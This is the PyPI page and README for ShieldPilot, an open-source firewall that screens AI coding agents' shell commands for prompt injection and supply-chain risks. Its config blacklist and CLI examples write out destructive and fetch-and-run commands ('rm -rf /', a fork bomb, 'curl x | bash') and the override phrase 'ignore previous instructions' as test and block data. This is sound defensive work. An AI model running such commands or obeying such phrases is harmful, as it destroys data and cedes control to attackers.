Security platform protecting autonomous AI coding agents

ShieldPilot

The open-source AI agent firewall.

Protect your AI agents from prompt injection, supply chain attacks, and MCP vulnerabilities — with a hook, a scanner, and a policy engine that runs wherever your agent runs.

What it does

AI agents (Claude Code, OpenClaw, custom LLM pipelines) execute shell commands, read files, call APIs, and install packages. ShieldPilot sits between the agent and the OS, scoring every action before it runs.

AI Agent ──► ShieldPilot Hook ──► Risk Engine ──► ALLOW / WARN / BLOCK
                                       │
                              Prompt Injection Scanner (220+ patterns, 5 languages)
                              ML Classifier (DeBERTa-v3, optional)
                              Indirect Injection (HTML/JSON/Markdown/Zero-Width)
                              Supply Chain Auditor
                              MCP Vulnerability Scanner
                              Agent Behavior Monitor
                              Policy-as-Code Engine
                              9 Behavior Analyzers
                                       │
                              Tamper-Evident Audit Log

$ sentinel run "rm -rf /"
  analyzing with 9 risk engines...
  risk_score: 100 | action: BLOCK
  command blocked. audit logged.
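
Of the checks in the pipeline above, the zero-width case is the easiest to illustrate in isolation. The following is a minimal sketch, not ShieldPilot's scanner: the character set and the function names `find_zero_width` and `strip_zero_width` are assumptions made for this example.

```python
import unicodedata

# Common zero-width / invisible code points (illustrative, not exhaustive).
ZERO_WIDTH = {
    "\u200b",  # zero width space
    "\u200c",  # zero width non-joiner
    "\u200d",  # zero width joiner
    "\u2060",  # word joiner
    "\ufeff",  # zero width no-break space (BOM)
}


def find_zero_width(text: str) -> list[tuple[int, str]]:
    """Return (index, Unicode name) for every zero-width character in text."""
    return [
        (i, unicodedata.name(ch, f"U+{ord(ch):04X}"))
        for i, ch in enumerate(text)
        if ch in ZERO_WIDTH
    ]


def strip_zero_width(text: str) -> str:
    """Remove zero-width characters so later pattern matching sees plain text."""
    return "".join(ch for ch in text if ch not in ZERO_WIDTH)
```

A phrase such as "ignore previous instructions" with a zero-width space inside "ignore" would slip past a naive substring match; stripping the invisible characters first closes that gap.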

Quick Start

pip install shieldpilot
sentinel init          # creates sentinel.yaml and sentinel.db
sentinel hook install  # install Claude Code pre-tool hook
sentinel dashboard     # open http://localhost:8420

That's it. Every command Claude Code runs is now evaluated before execution.

Optional: ML-powered injection classifier (DeBERTa-v3)

pip install "shieldpilot[ml]"   # quotes keep shells such as zsh from expanding the brackets
sentinel ml-setup      # download ProtectAI DeBERTa-v3 model (~260 MB)

Scan an MCP server config

sentinel mcp-scan ~/.claude/claude_desktop_config.json
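
To give a feel for what such a scan looks for, here is a rough sketch of two checks over a config file. It assumes the config uses a top-level `mcpServers` mapping whose entries carry `args` and `env` keys; the regexes and the function name `scan_mcp_config` are hypothetical and are not ShieldPilot's actual rules.

```python
import json
import re

# Hypothetical heuristics for illustration only.
SECRET_KEY_HINT = re.compile(r"(token|secret|password|api[_-]?key)", re.IGNORECASE)
PLAIN_HTTP = re.compile(r"^http://", re.IGNORECASE)


def scan_mcp_config(raw: str) -> list[str]:
    """Return human-readable findings for an MCP config given as JSON text."""
    findings = []
    servers = json.loads(raw).get("mcpServers", {})
    for name, spec in servers.items():
        # Secrets stored inline in the env block are readable on disk.
        for key, value in spec.get("env", {}).items():
            if SECRET_KEY_HINT.search(key) and value:
                findings.append(f"{name}: inline secret in env var {key}")
        # Unencrypted endpoints passed as arguments.
        for arg in spec.get("args", []):
            if isinstance(arg, str) and PLAIN_HTTP.match(arg):
                findings.append(f"{name}: plain-HTTP endpoint {arg}")
    return findings
```

Reading the file with `pathlib.Path(path).expanduser().read_text()` and passing the text to `scan_mcp_config` is enough to try it on a real config.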

Audit your dependencies

sentinel supply-chain-audit requirements.txt
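
One of the checks an audit like this typically includes is typosquatting detection. The sketch below shows the general idea using the standard library's `difflib`; the `POPULAR` list, the 0.8 similarity cutoff, and the function names are assumptions for this example, not the auditor's real data or logic.

```python
import difflib
import re

# Tiny illustrative list; a real audit would use a much larger package index.
POPULAR = ["requests", "numpy", "pandas", "django", "flask", "urllib3"]


def package_names(requirements_text: str) -> list[str]:
    """Extract bare package names from requirements.txt-style text."""
    names = []
    for line in requirements_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue  # skip blanks, comments, and pip options such as -r / -e
        match = re.match(r"[A-Za-z0-9][A-Za-z0-9._-]*", line)
        if match:
            names.append(match.group(0).lower())
    return names


def typosquat_candidates(requirements_text: str, cutoff: float = 0.8) -> dict[str, str]:
    """Map each suspicious name to the popular package it closely resembles."""
    suspects = {}
    for name in package_names(requirements_text):
        if name in POPULAR:
            continue  # exact match with a known package is not a typo
        close = difflib.get_close_matches(name, POPULAR, n=1, cutoff=cutoff)
        if close:
            suspects[name] = close[0]
    return suspects
```

A name that is close to, but not identical with, a well-known package is only a candidate; it still needs a human or a registry lookup to confirm.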

Features

Feature	Description
Prompt Injection Detection	220+ patterns across 19 categories — jailbreaks, role manipulation, fake history, policy erosion, stealth memos, presupposition attacks. Multilingual (5 languages).
ML Injection Classifier	Optional ProtectAI DeBERTa-v3 ONNX model. Install with `pip install "shieldpilot[ml]"`, then run `sentinel ml-setup`. Runs offline, no API calls.
Indirect Injection Detection	Scans HTML, JSON, Markdown, and tool outputs for injections hidden in zero-width chars, Unicode homoglyphs, and data payloads.
MCP Security Scanner	Detects SSRF vectors, leaked secrets, over-privileged tool definitions, and missing auth in MCP server configs.
Supply Chain Auditor	Flags malicious packages, typosquatting candidates, GPL license conflicts, and dependency confusion vectors in requirements files.
Agent Behavior Monitor	Baseline + anomaly detection. Records normal agent behavior; alerts on deviations across 9 risk dimensions.
Policy-as-Code Engine	Declarative YAML policies. 3 built-in profiles (default_safe, strict_production, development). Fully composable.
9 Behavior Analyzers	Destructive FS, privilege escalation, network exfiltration, credential access, persistence, obfuscation, malware patterns, supply chain, injection
Tamper-Evident Logging	SHA-256 hash chain across 5 audit tables. `sentinel verify` detects any tampering.
Multi-Platform Hook	Claude Code, OpenClaw, generic JSON — auto-detected via adapter layer.
Web Dashboard	Real-time command log, incident management, scan history, chain integrity.
REST API	Full API at `/api/docs` for CI/CD and SIEM integration.
Self-Hosted	SQLite by default, no external dependencies, runs air-gapped.
Stripe Billing	Free / Pro / Enterprise tiers with self-serve checkout.
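
The Tamper-Evident Logging row relies on a SHA-256 hash chain. The following is a minimal in-memory sketch of that general technique, not ShieldPilot's schema: the entry layout, the all-zero genesis value, and the helper names are assumptions for illustration.

```python
import hashlib
import json

GENESIS = "0" * 64  # placeholder "previous hash" for the first entry


def entry_hash(prev_hash: str, record: dict) -> str:
    """Hash the previous link together with a canonical JSON form of the record."""
    body = json.dumps(record, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + body).encode("utf-8")).hexdigest()


def append(chain: list[dict], record: dict) -> None:
    """Append a record, linking it to the hash of the entry before it."""
    prev = chain[-1]["hash"] if chain else GENESIS
    chain.append({"record": record, "prev": prev, "hash": entry_hash(prev, record)})


def verify(chain: list[dict]) -> int:
    """Return the index of the first broken link, or -1 if the chain is intact."""
    prev = GENESIS
    for i, entry in enumerate(chain):
        if entry["prev"] != prev or entry["hash"] != entry_hash(prev, entry["record"]):
            return i
        prev = entry["hash"]
    return -1
```

Because each hash covers the previous one, editing any stored record invalidates that entry and every entry after it, which is what makes a later verification pass meaningful.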

Architecture

graph LR
    A[AI Agent] -->|pre-tool-use| B[Hook]
    B --> C[Adapter Layer]
    C -->|normalized input| D[Risk Engine]
    D --> E[Prompt Injection Scanner]
    D --> E2[ML Classifier]
    D --> F[Supply Chain Auditor]
    D --> G[Behavior Analyzers x9]
    D --> H2[MCP Scanner]
    D --> H3[Indirect Injection]
    D --> H4[Behavior Monitor]
    E & E2 & F & G & H2 & H3 & H4 --> H{Score 0-100}
    H -->|< 40| I[ALLOW]
    H -->|40-79| J[WARN]
    H -->|>= 80| K[BLOCK]
    I & J & K --> L[(Audit Log)]
    L --> M[Web Dashboard]
    L --> N[REST API]
    O[Policy Engine] -->|rules| D

sentinelai/
├── adapters/      # Platform detection: Claude Code, OpenClaw, generic
├── api/           # FastAPI REST API (18 routers)
├── cli/           # Typer CLI
├── engine/        # Risk scoring engine + 9 analyzers
├── hooks/         # Claude Code pre-tool-use hook
├── logger/        # Tamper-evident SQLite logging
├── migrations/    # Alembic + safe migration runner
├── ml/            # DeBERTa-v3 ONNX classifier (optional)
├── monitor/       # Agent behavior baseline + anomaly detection
├── policy/        # Policy-as-Code engine + 3 default YAML policies
├── sandbox/       # Sandboxed command execution
├── scanner/       # Prompt injection, indirect injection, MCP, supply chain
├── services/      # Business logic (auth, billing, teams, rules)
└── web/           # Vanilla JS SPA dashboard

Comparison

Capability	ShieldPilot	Lakera Guard	Prompt Security	Astrix Security
Open-Source	✅ Apache 2.0	❌	❌	❌
Self-Hosted	✅	❌ SaaS only	❌ SaaS only	❌ SaaS only
MCP Scanner	✅	❌	❌	❌
Supply Chain	✅	❌	❌	✅ partial
Prompt Injection	✅ 220+ patterns	✅	✅	❌
ML Classifier	✅ DeBERTa-v3	✅	✅	❌
Indirect Injection	✅ HTML/JSON/MD	❌	❌	❌
Agent Behavior Monitor	✅	❌	❌	✅ partial
Policy-as-Code	✅ YAML	❌	❌	❌
Claude Code Hook	✅ native	❌	❌	❌
Audit Log Integrity	✅ hash chain	❌	❌	❌
Price	Free tier (OSS); paid Pro and Enterprise tiers	Enterprise	Enterprise	Enterprise

Installation

# From PyPI
pip install shieldpilot

# With ML-powered injection classifier (DeBERTa-v3, ~260 MB model)
pip install "shieldpilot[ml]"

# From source
git clone https://github.com/maxwalser001-del/Cyber-Security-.git
cd Cyber-Security-
pip install -e ".[dev]"

Requirements: Python 3.9+, SQLite 3.x

Configuration

# sentinel.yaml
sentinel:
  mode: enforce          # enforce | audit | disabled
  risk_thresholds:
    block: 80
    warn: 40
  protected_paths: [/etc, ~/.ssh, ~/.aws, ~/.gnupg]
  whitelist:
    commands: [ls, cat, echo, pwd, whoami, git status]
  blacklist:
    commands: ["rm -rf /", "mkfs", ":(){:|:&};:"]
    domains: []
  sandbox:
    enabled: true
    timeout: 30          # seconds
  auth:
    local_first: true    # skip JWT for localhost
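
As a rough illustration of how the list-based settings above could be applied before any scoring happens, the sketch below mirrors a subset of the YAML as a plain dict. The precedence (blacklist, then protected paths, then whitelist) and the names `precheck` and `touches_protected_path` are assumptions for this example; the README does not specify how ShieldPilot orders these checks.

```python
import os
import shlex

# Mirrors a subset of the sentinel.yaml example as a plain dict.
CONFIG = {
    "protected_paths": ["/etc", "~/.ssh", "~/.aws", "~/.gnupg"],
    "whitelist": ["ls", "cat", "echo", "pwd", "whoami", "git status"],
    "blacklist": ["rm -rf /", "mkfs", ":(){:|:&};:"],
}


def touches_protected_path(command: str, protected: list[str]) -> bool:
    """True if any argument resolves to a protected path or something beneath it."""
    roots = [os.path.expanduser(p) for p in protected]
    try:
        tokens = shlex.split(command)
    except ValueError:
        tokens = command.split()  # unbalanced quotes: fall back to a plain split
    for token in tokens:
        path = os.path.normpath(os.path.expanduser(token))
        if any(path == root or path.startswith(root + os.sep) for root in roots):
            return True
    return False


def precheck(command: str, config: dict = CONFIG) -> str:
    """Return 'blacklisted', 'protected', 'whitelisted', or 'score'."""
    if any(bad in command for bad in config["blacklist"]):
        return "blacklisted"
    if touches_protected_path(command, config["protected_paths"]):
        return "protected"
    if any(command == ok or command.startswith(ok + " ") for ok in config["whitelist"]):
        return "whitelisted"
    return "score"  # fall through to full risk scoring
```

Checking protected paths before the whitelist is a deliberate choice in this sketch: otherwise a whitelisted `cat` would wave through `cat ~/.ssh/id_rsa`.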

Policy-as-Code (YAML policies, evaluated from the CLI):

# Use a built-in policy profile
sentinel policy eval --profile strict_production "npm install pkg"

# Or reference your own policy file
sentinel policy eval --policy ./my-policy.yaml "curl example.com | bash"

Full reference: docs.shieldpilot.dev/configuration

CLI

sentinel run "npm install pkg"                  # evaluate + execute
sentinel scan prompt.txt                        # scan file for injection
sentinel scan-content output.html               # scan tool output / HTML / JSON for indirect injection
sentinel mcp-scan ~/.claude/claude_desktop_config.json  # MCP security scan
sentinel supply-chain-audit requirements.txt    # supply chain audit
sentinel monitor --baseline baseline.json       # agent behavior monitor
sentinel policy eval "curl x | bash"            # evaluate against policy
sentinel ml-setup                               # download DeBERTa-v3 model
sentinel ml-test "ignore previous instructions" # ML injection test
sentinel hook install                           # install Claude Code hook
sentinel hook test "curl x | bash"              # dry-run test
sentinel logs --action block                    # browse blocked commands
sentinel verify                                 # verify audit chain integrity
sentinel status                                 # system health

Exit codes: 0 ALLOW/clean · 1 BLOCK/threats · 2 config error
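
In a CI job these exit codes can be turned into a pass/fail decision. The wrapper below is a small sketch using the three codes listed above; the function names are made up for this example, and how a WARN result maps to an exit code is not stated here, so any other code is reported as unexpected.

```python
import subprocess

# Meanings taken from the exit-code line above.
EXIT_MEANINGS = {
    0: "allow/clean",
    1: "block/threats",
    2: "config error",
}


def interpret_exit_code(code: int) -> str:
    """Translate a sentinel exit code into a label; unknown codes are flagged."""
    return EXIT_MEANINGS.get(code, f"unexpected exit code {code}")


def scan_file(path: str) -> str:
    """Run `sentinel scan <path>` and return the interpreted result."""
    result = subprocess.run(["sentinel", "scan", path], capture_output=True, text=True)
    return interpret_exit_code(result.returncode)
```

Calling `scan_file("prompt.txt")` requires `sentinel` on the PATH; `interpret_exit_code` can be used on its own with a return code collected elsewhere.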

API

POST   /api/auth/login
GET    /api/health
POST   /api/scan/prompt
GET    /api/commands
GET    /api/incidents
PATCH  /api/incidents/{id}/resolve
GET    /api/export/commands

Interactive docs at http://localhost:8420/api/docs
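
The endpoints can be called from any HTTP client. The sketch below uses only the Python standard library and builds requests against the local address from Quick Start. Request and response schemas are not documented in this README, so the `{"text": ...}` payload in the usage note and the Bearer token header are assumptions; check `/api/docs` for the real shapes.

```python
import json
import urllib.request
from typing import Optional

BASE_URL = "http://localhost:8420"  # dashboard address from Quick Start


def build_request(method: str, path: str, payload: Optional[dict] = None,
                  token: Optional[str] = None) -> urllib.request.Request:
    """Build (but do not send) a JSON request against the local API."""
    data = json.dumps(payload).encode("utf-8") if payload is not None else None
    headers = {"Accept": "application/json"}
    if data is not None:
        headers["Content-Type"] = "application/json"
    if token:
        # Bearer scheme is an assumption; the config only mentions JWT auth.
        headers["Authorization"] = f"Bearer {token}"
    return urllib.request.Request(BASE_URL + path, data=data, headers=headers, method=method)


def call(request: urllib.request.Request) -> dict:
    """Send the request and decode the JSON response body."""
    with urllib.request.urlopen(request, timeout=10) as response:
        return json.loads(response.read().decode("utf-8"))
```

With the dashboard running, `call(build_request("GET", "/api/health"))` performs a health check, and `build_request("POST", "/api/scan/prompt", {"text": "..."})` prepares a scan request under the payload assumption stated above.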

Risk Scoring

Score	Level	Action
0–39	Low	ALLOW — runs automatically
40–79	Medium/High	WARN — pause for review
80–100	Critical	BLOCK — denied, incident logged
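
The table translates directly into a threshold check. The function below is a minimal sketch of that mapping using the default `warn: 40` and `block: 80` values from the configuration example; the name `action_for` is an assumption for this example.

```python
def action_for(score: int, warn: int = 40, block: int = 80) -> str:
    """Map a 0-100 risk score to ALLOW, WARN, or BLOCK."""
    if not 0 <= score <= 100:
        raise ValueError(f"score out of range: {score}")
    if score >= block:
        return "BLOCK"
    if score >= warn:
        return "WARN"
    return "ALLOW"
```

Passing different `warn` and `block` values models a stricter or looser setting of `risk_thresholds`.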

Pricing

Limit	Free	Pro ($19.99/mo)	Enterprise
Commands/day	50	1,000	Unlimited
Scans/day	10	100	Unlimited
History	1 day	30 days	90 days
Export + API	-	Yes	Yes
Priority support	-	-	Yes

Contributing

Contributions are welcome. See CONTRIBUTING.md for setup, code style, and PR process.

Key areas where help is most useful:

New injection patterns (see sentinelai/scanner/patterns.py)
New risk analyzers (see sentinelai/engine/)
MCP tool definition scanning
IDE integrations beyond Claude Code

Security

Found a vulnerability? See SECURITY.md for responsible disclosure.

Development

git clone https://github.com/maxwalser001-del/Cyber-Security-.git
cd Cyber-Security-
pip install -e ".[dev]"
pytest tests/ -x -q    # 2633 tests

License

Apache 2.0 — see LICENSE.

Version 0.2.0, uploaded to PyPI on Mar 30, 2026

Download files

Source Distribution

shieldpilot-0.2.0.tar.gz (408.0 kB)

Uploaded Mar 30, 2026 Source

Built Distribution

shieldpilot-0.2.0-py3-none-any.whl (428.6 kB)

Uploaded Mar 30, 2026 Python 3

File details

Details for the file shieldpilot-0.2.0.tar.gz.

File metadata

Download URL: shieldpilot-0.2.0.tar.gz
Upload date: Mar 30, 2026
Size: 408.0 kB
Tags: Source
Uploaded using Trusted Publishing? No
Uploaded via: twine/6.2.0 CPython/3.9.6

File hashes

Hashes for shieldpilot-0.2.0.tar.gz
Algorithm	Hash digest
SHA256	`5e8afcdaed88bd385282c612cda614a18e5a1969d307b49849f403d4cc4318e5`
MD5	`e065ccc514e25fd31d6b4f16c9ee59e3`
BLAKE2b-256	`6816b57a8bfd23d64cea6c60baf565a4ce15f177b6e3fc3ad796201d79b4d932`

File details

Details for the file shieldpilot-0.2.0-py3-none-any.whl.

File metadata

Download URL: shieldpilot-0.2.0-py3-none-any.whl
Upload date: Mar 30, 2026
Size: 428.6 kB
Tags: Python 3
Uploaded using Trusted Publishing? No
Uploaded via: twine/6.2.0 CPython/3.9.6

File hashes

Hashes for shieldpilot-0.2.0-py3-none-any.whl
Algorithm	Hash digest
SHA256	`311b21e0801a107891e85cf730d9145cebe982ae3515a11901da1413d66b6814`
MD5	`c2446444d11dd6a0fb169436c229b38f`
BLAKE2b-256	`665d52c40f33686f40e55fd60fd5794930fc8eace07a4bde43363a901f2297e8`
